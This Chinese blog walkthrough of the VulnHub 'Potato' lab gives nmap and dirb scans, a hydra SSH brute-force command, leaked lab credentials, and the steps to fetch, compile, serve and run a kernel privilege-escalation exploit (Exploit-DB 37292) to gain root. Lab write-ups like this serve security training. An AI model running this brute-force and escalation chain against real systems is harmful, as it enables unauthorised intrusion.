vlunhub之potato

目录

 

信息搜集

扫描网段

扫描端口

扫描网站目录

发现漏洞

尝试爆破

登录

提权

查看内核版本找到合适的poc


信息搜集

扫描网段

nmap -sP 192.168.179.0/24

扫描端口

nmap -sS -sV -p- -v 192.168.179.129

扫描网站目录

dirb http://192.168.179.129/

发现漏洞

挨个进这几个页面去看一看,只知道一个phpinfo界面,找到一个算是敏感信息泄露的漏洞,其他的就没有什么搞头了

只能转变思路去搞7120端口,因为是ssh服务所以可以尝试连接,然后就想到有没有可能是弱口令,尝试加载个字典跑一下

尝试爆破

hydra -L 用户名字典 -P 密码字典 ssh://192.168.179.129:7120

说实话这个账号密码我是真没跑出来,参考别人的博客账号是potato,密码是letmein

登录

ssh potato@192.168.179.129 -p 7120

提权

查看内核版本找到合适的poc

uname -a

在kali中另起一个终端搜索

searchsploit ubuntu 3.13.0-24

下载37292到本地,不过我这个本地有,就进到相应的文件夹下编译该poc

 

 

 

 

 

多说一句可能会编译失败,可以尝试完整安装一下gcc

我把编译好后的文件重命名为exp且放在/var/www/html/目录下,可以进到该目录查看一下。

利用python开启http服务

python -m SimpleHTTPServer 8000

 

下载exp到potapo

我这里是因为已经上传过一次了

接下来就是查看权限,给权限,执行poc,拿到root权限一气呵成

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值